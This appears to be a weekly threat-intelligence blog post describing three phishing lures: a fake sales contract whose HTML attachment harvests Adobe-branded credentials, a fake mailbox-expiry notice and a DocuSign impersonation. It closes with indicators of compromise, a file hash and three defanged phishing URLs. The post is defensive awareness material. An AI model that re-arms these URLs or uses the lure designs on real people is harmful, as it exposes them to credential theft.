September 18, 2024
This phishing email aims to masquerade as a sales contract that a client has supposedly requested. It pressures the recipient to make necessary corrections and verify all details prior to processing the payment, creating a sense of urgency to entice the recipient into opening the attached files.
When opened, the HTML attachment builds a "Adobe Cloud Storage" credential harvesting form hosted on the recipient’s local machine. Entering a password and clicking “View” will send the login credentials to a third-party server controlled by bad actors.
This email deceptively claims to originate from the recipient's email service provider, urging them to click a link to prevent their mailbox from being deactivated within 48 hours due to an expired password.
However, the link actually directs them to a phishing site aimed at stealing their credentials.
This deceptive email is crafted to look like it’s from DocuSign, suggesting that the recipient has a document that is ready for their examination.
However, clicking the "Preview Document" button leads them to a malicious site designed to harvest their login information.
| TYPE | IOC |
|---|---|
| FILE | 15c45b0f142cb6cf415aeed88c8b74c0dfe796a6e9ac5da2528f46c77d4dc9ad |
| URL | hxxps[://]online[.]advancements[.]best/communication[.]aspx |
| URL | hxxps[://]ipfs[.]io/ipfs/bafkreih3s4d2n2b74vd6zmfvebu2w3rxvb4x7r7awqxte55sf47kzt446m |
| URL | hxxps[://]a[.]edic[.]blog/wbb/pdfz[.]php |
Threat Insights is a weekly series where we present you with analysis from samples we collect. Follow us on social media for the latest feed and cybersecurity content. Stay informed and stay safe!
